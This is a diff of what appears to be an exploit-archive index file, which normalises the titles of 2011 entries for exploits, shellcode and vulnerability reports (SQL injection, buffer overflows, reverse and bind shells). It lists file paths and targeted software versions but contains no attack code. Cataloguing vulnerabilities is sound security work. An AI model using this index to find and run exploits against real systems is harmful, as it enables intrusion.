Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17118,platforms/php/webapps/17118.txt,"OpenEMR 4.0.0 - Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",php,webapps,0 -17119,platforms/php/webapps/17119.txt,"Wordpress Plugin Custom Pages 0.5.0.1 - Local File Inclusion",2011-04-05,"AutoSec Tools",php,webapps,0 +17119,platforms/php/webapps/17119.txt,"WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion",2011-04-05,"AutoSec Tools",php,webapps,0 17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Function Stack Corruption",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 17181,platforms/linux/remote/17181.pl,"FiSH-irssi 0.99 - Evil ircd Buffer Overflow",2011-04-17,"Caleb James DeLisle",linux,remote,0 17124,platforms/windows/local/17124.pl,"MPlayer (r33064 Lite) - Buffer Overflow + ROP Exploit",2011-04-06,Nate_M,windows,local,0 @@ -14922,8 +14923,8 @@ id,file,description,date,author,platform,type,port 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS - SQL Injection",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vBulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,php,webapps,0 -17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - ICO With Transparent Colour Denial of Service & RDenial of Service",2011-04-10,BraniX,windows,dos,0 -17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - ICO Without Transparent Colour Denial of Service & RDenial of Service",2011-04-10,BraniX,windows,dos,0 +17142,platforms/windows/dos/17142.py,"Irfanview 4.28 - ICO With Transparent Colour Denial of Service & RDenial of Service",2011-04-10,BraniX,windows,dos,0 +17143,platforms/windows/dos/17143.py,"Irfanview 4.28 - ICO Without Transparent Colour Denial of Service & RDenial of Service",2011-04-10,BraniX,windows,dos,0 17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - '.zip' Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection",2011-04-11,R3d-D3V!L,php,webapps,0 17147,platforms/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation",2011-04-11,ph0x90bic,linux,local,0 @@ -14933,7 +14934,7 @@ id,file,description,date,author,platform,type,port 17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar - MAILTO Buffer Overflow",2011-04-04,Metasploit,windows,remote,25 17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager - Authenticated Code Execution",2011-04-08,Metasploit,windows,remote,9090 17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro 1.70 - '.visprj' Buffer Overflow",2011-04-11,Metasploit,windows,local,0 -17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' Remote Code Execution Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0 +17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' Remote Code Execution",2011-04-12,"Gerry Eisenhaur",windows,remote,0 17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0 17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 - '.ord' Buffer Overflow",2011-04-12,"C4SS!0 G0M3S",windows,local,0 17158,platforms/windows/local/17158.txt,"Microsoft HTML Help 6.1 - Stack Overflow",2011-04-12,"Luigi Auriemma",windows,local,0 @@ -14959,7 +14960,7 @@ id,file,description,date,author,platform,type,port 17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP + ASLR Bypass)",2011-04-19,Abysssec,windows,remote,0 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1-1.4.4 - SEH Overflow",2011-04-18,sickness,windows,local,0 17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,Metasploit,windows,local,0 -17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vunerabilities",2011-04-22,NoNameMT,php,webapps,0 +17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vulnerabilities",2011-04-22,NoNameMT,php,webapps,0 17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0 17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 17191,platforms/php/webapps/17191.txt,"Ultimate eShop - Error Based SQL Injection",2011-04-20,Romka,php,webapps,0 @@ -14968,18 +14969,18 @@ id,file,description,date,author,platform,type,port 17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 17195,platforms/windows/remote/17195.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (2)",2011-04-19,Metasploit,windows,remote,0 17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution",2011-04-21,Metasploit,unix,remote,0 -17200,platforms/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 - x-forwarded-for HTTP Header presisitent Cross-Site Scripting",2011-04-22,Saif,php,webapps,0 +17200,platforms/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 - x-forwarded-for HTTP Header Persistent Cross-Site Scripting",2011-04-22,Saif,php,webapps,0 17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 17202,platforms/php/webapps/17202.txt,"Dolibarr ERP/CRM 3.0.0 - Multiple Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 17203,platforms/php/webapps/17203.txt,"Web2Project 2.3 - SQL Injection",2011-04-22,"AutoSec Tools",php,webapps,0 17204,platforms/php/webapps/17204.txt,"DynMedia Pro Web CMS 4.0 - Local File Disclosure",2011-04-22,Mbah_Semar,php,webapps,0 17205,platforms/php/webapps/17205.txt,"4Images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injections",2011-04-22,^Xecuti0N3r,php,webapps,0 -17207,platforms/php/webapps/17207.txt,"Wordpress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 +17207,platforms/php/webapps/17207.txt,"WordPress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 - SQL Injection",2011-04-25,"AutoSec Tools",php,webapps,0 17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 - (PluginController.php) Local File Inclusion",2011-04-25,"AutoSec Tools",php,webapps,0 17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0 -17214,platforms/php/webapps/17214.php,"Wordpress SermonBrowser Plugin 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 +17214,platforms/php/webapps/17214.php,"WordPress SermonBrowser Plugin 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0 17216,platforms/php/webapps/17216.txt,"Quick.CMS 3.0 - Cross-Site Request Forgery",2011-04-26,^Xecuti0N3r,php,webapps,0 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 - SEH Unicode Buffer Overflow",2011-04-27,"Brandon Murphy",windows,local,0 @@ -14987,7 +14988,7 @@ id,file,description,date,author,platform,type,port 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server - Directory Traversal Remote Code Execution",2011-04-27,Metasploit,windows,remote,18821 17220,platforms/php/webapps/17220.txt,"eyeos 1.9.0.2 - Persistent Cross-Site Scripting using image files",2011-04-28,"Alberto Ortega",php,webapps,0 17221,platforms/php/webapps/17221.txt,"kusaba x 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 -17222,platforms/linux/dos/17222.c,"libmodplug 0.8.8.2 - (.abc) Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0 +17222,platforms/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 17224,platforms/osx/shellcode/17224.s,"OS-X/Intel (x86_64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' SEH Unicode Buffer Overflow",2011-04-28,Metasploit,windows,local,0 @@ -14997,7 +14998,7 @@ id,file,description,date,author,platform,type,port 17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m' Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m' Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 17231,platforms/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,php,webapps,0 -17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 - (build 2055) Buffer Overflow",2011-05-04,xsploitedsec,windows,remote,0 +17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 (build 2055) - Buffer Overflow",2011-05-04,xsploitedsec,windows,remote,0 17317,platforms/windows/local/17317.rb,"VisiWave - VWR File Parsing Trusted Pointer",2011-05-23,Metasploit,windows,local,0 17318,platforms/multiple/local/17318.php,"PHP 5.3.5 - socket_connect() Buffer Overflow",2011-05-25,"Marek Kroemeke",multiple,local,0 17323,platforms/windows/shellcode/17323.c,"Windows - WinExec add new local administrator _RubberDuck_ + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0 @@ -15029,9 +15030,9 @@ id,file,description,date,author,platform,type,port 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server - Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,hardware,remote,0 -17284,platforms/php/webapps/17284.txt,"EditorMonkey Wordpress Plugin 2.5 - (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 +17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 - (banner_manager.php) Remote File Upload",2011-05-14,"Number 7",php,webapps,0 -17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0 +17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' Component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0 17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps,0 17289,platforms/php/webapps/17289.txt,"frame-oshop - SQL Injection",2011-05-15,-SmoG-,php,webapps,0 17290,platforms/hardware/remote/17290.txt,"XtreamerPRO Media-player 2.6.0 / 2.7.0 - Multiple Vulnerabilities",2011-05-16,"Itzik Chen",hardware,remote,0 @@ -15043,7 +15044,7 @@ id,file,description,date,author,platform,type,port 17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0 17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory - Denial of Service",2011-05-16,nSense,netware,dos,0 -17299,platforms/php/webapps/17299.txt,"Wordpress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0 +17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0 17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,Metasploit,windows,remote,0 17302,platforms/windows/local/17302.py,"Sonique 1.96 - '.m3u' Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0 17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0 @@ -15060,15 +15061,15 @@ id,file,description,date,author,platform,type,port 17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x 4.1.2 - 'search.php' SQL Injection",2011-05-23,D4rkB1t,php,webapps,0 17316,platforms/php/webapps/17316.txt,"PHPortfolio - SQL Injection",2011-05-23,lionaneesh,php,webapps,0 17320,platforms/php/webapps/17320.txt,"i-doIT 0.9.9-4 - Local File Inclusion",2011-05-25,"AutoSec Tools",php,webapps,0 -17321,platforms/php/webapps/17321.txt,"ExtCalendar 2.0b2 - (cal_search.php) SQL Injection",2011-05-25,"High-Tech Bridge SA",php,webapps,0 +17321,platforms/php/webapps/17321.txt,"Extcalendar 2.0b2 - (cal_search.php) SQL Injection",2011-05-25,"High-Tech Bridge SA",php,webapps,0 17322,platforms/php/webapps/17322.txt,"eGroupWare 1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 17324,platforms/php/webapps/17324.rb,"AWStats Totals 1.14 multisort - Remote Command Execution",2011-05-25,Metasploit,php,webapps,0 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 - SQL Injection",2011-05-26,"AutoSec Tools",php,webapps,0 17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0 -17327,platforms/php/webapps/17327.txt,"HB Ecommerce - SQL Injection",2011-05-27,takeshix,php,webapps,0 +17327,platforms/php/webapps/17327.txt,"HB eCommerce - SQL Injection",2011-05-27,takeshix,php,webapps,0 17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0 -17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0 +17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (without egg-hunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0 17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - Cross-Site Request Forgery (Add User PHP Script)",2011-05-27,ninjashell,php,webapps,0 17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection",2011-05-28,M.Jock3R,php,webapps,0 17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection",2011-05-28,v3n0m,php,webapps,0 @@ -15094,27 +15095,27 @@ id,file,description,date,author,platform,type,port 17361,platforms/windows/remote/17361.py,"Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)",2011-06-04,"Glafkos Charalambous ",windows,remote,0 17362,platforms/windows/local/17362.cpp,"OpenDrive 1.3.141 - Local Password Disclosure",2011-06-04,"Glafkos Charalambous ",windows,local,0 17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - '.zip' Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0 -17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0 +17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0 17365,platforms/windows/remote/17365.py,"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM Exploit",2011-06-07,"Jeremy Brown",windows,remote,0 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Remote Buffer Overflow (post-auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 +17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0 17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0 -17376,platforms/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 +17376,platforms/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 17377,platforms/hardware/webapps/17377.txt,"Polycom IP Phone - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 - (rm) Arbitrary File Deletion Exploit",2011-06-10,LiquidWorm,php,webapps,0 -17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - (l parameter) Local File Inclusion",2011-06-10,LiquidWorm,php,webapps,0 -17380,platforms/php/webapps/17380.txt,"Angora GuestBook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0 -17381,platforms/windows/remote/17381.txt,"simple web-server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 +17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - (l Parameter) Local File Inclusion",2011-06-10,LiquidWorm,php,webapps,0 +17380,platforms/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0 +17381,platforms/windows/remote/17381.txt,"simple Web-Server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server - Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 -17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0 +17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0 17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,Metasploit,windows,remote,0 17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 FTP Server - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0 -17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 +17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual Appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection",2011-06-11,BlueH4G,php,webapps,0 17390,platforms/php/webapps/17390.txt,"SUBRION CMS - Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0 17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation",2011-06-11,"Dan Rosenberg",linux,local,0 @@ -15123,30 +15124,30 @@ id,file,description,date,author,platform,type,port 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 - File Inclusion",2011-06-13,jdc,php,webapps,0 17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0 -17398,platforms/windows/dos/17398.txt,"Windows Media Player with K-Lite Codec Pack - Denial of Service (PoC)",2011-06-14,"Nicolas Krassas",windows,dos,0 +17398,platforms/windows/dos/17398.txt,"Microsoft Windows Media Player with K-Lite Codec Pack - Denial of Service (PoC)",2011-06-14,"Nicolas Krassas",windows,dos,0 17399,platforms/windows/dos/17399.txt,"Microsoft Office XP - Remote code Execution",2011-06-14,"Francis Provencher",windows,dos,0 17400,platforms/linux/dos/17400.c,"Conky Linux 1.8.0 - Local Denial of Service (PoC)",2011-06-14,"Arturo D'Elia",linux,dos,0 17401,platforms/windows/dos/17401.txt,"Microsoft HyperV - Persistent Denial of Service",2011-06-14,"Core Security",windows,dos,0 17402,platforms/php/webapps/17402.txt,"AMHSHOP 3.7.0 - SQL Injection",2011-06-15,"Yassin Aboukir",php,webapps,0 17403,platforms/php/webapps/17403.txt,"Free Simple CMS 1.0 - Multiple Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 -17404,platforms/multiple/webapps/17404.txt,"IBM WebSphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",multiple,webapps,0 +17404,platforms/multiple/webapps/17404.txt,"IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",multiple,webapps,0 17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 - Denial of Service",2011-06-16,"Soroush Dalili",windows,dos,0 -17406,platforms/php/webapps/17406.txt,"Catalog Builder - Ecommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0 +17406,platforms/php/webapps/17406.txt,"Catalog Builder - eCommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 - Persistent Cross-Site Scripting (via SQL Injection)",2011-06-17,Saif,php,webapps,0 -17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - mshtml!CObjectElement Use-After-Free (MS11-050)",2011-06-17,Metasploit,windows,remote,0 +17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050)",2011-06-17,Metasploit,windows,remote,0 17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0 17411,platforms/php/webapps/17411.txt,"A Cool Debate 1.0.3 Component Joomla - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0 17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) - SQL Injection",2011-06-19,CoBRa_21,php,webapps,0 17413,platforms/php/webapps/17413.txt,"Burning Board 3.1.5 - Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps,0 17414,platforms/php/webapps/17414.txt,"Joomla Component Calc Builder - 'id' Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0 -17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 +17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution",2011-06-20,mr_me,windows,remote,0 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,Metasploit,windows,remote,0 -17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Authenticated Local File Inclusion Exploit (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0 +17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Authentication Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (2)",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service (PoC)",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote,0 -17423,platforms/php/webapps/17423.txt,"WPtouch Wordpress Plugin 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 +17423,platforms/php/webapps/17423.txt,"WPtouch WordPress Plugin 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page - ActiveX Control Arbitrary File Download",2011-06-21,Metasploit,windows,remote,0 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection",2011-06-21,"Brendan Coles",php,webapps,0 17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 @@ -15160,7 +15161,7 @@ id,file,description,date,author,platform,type,port 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0 17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 -17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 +17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security Vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 17444,platforms/php/webapps/17444.txt,"Webcat - Multiple Blind SQL Injection",2011-06-23,w0rd,php,webapps,0 17445,platforms/php/webapps/17445.txt,"2Point Solutions - 'cmspages.php' SQL Injection",2011-06-23,"Newbie Campuz",php,webapps,0 17446,platforms/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion",2011-06-23,bd0rk,php,webapps,0 @@ -15169,7 +15170,7 @@ id,file,description,date,author,platform,type,port 17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,Metasploit,windows,remote,0 17451,platforms/windows/local/17451.rb,"Microsoft Visio - VISIODWG.dll DXF File Handling",2011-06-26,Metasploit,windows,local,0 17452,platforms/php/webapps/17452.txt,"JoomlaXi - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",php,webapps,0 -17453,platforms/php/webapps/17453.txt,"Wordpress Beer Recipes Plugin 1.0 - Cross-Site Scripting",2011-06-26,TheUzuki.',php,webapps,0 +17453,platforms/php/webapps/17453.txt,"WordPress Beer Recipes Plugin 1.0 - Cross-Site Scripting",2011-06-26,TheUzuki.',php,webapps,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection",2011-06-28,hamt0ry,php,webapps,0 17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 @@ -15178,16 +15179,16 @@ id,file,description,date,author,platform,type,port 17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Root Exploit",2011-06-30,kingcope,freebsd,remote,0 17463,platforms/linux/dos/17463.pl,"Rhythmbox - '.m3u' Local Crash (PoC)",2011-06-30,Caddy-Dz,linux,dos,0 17464,platforms/php/webapps/17464.txt,"Joomla mdigg Component - SQL Injection",2011-07-01,"Caddy Dz",php,webapps,0 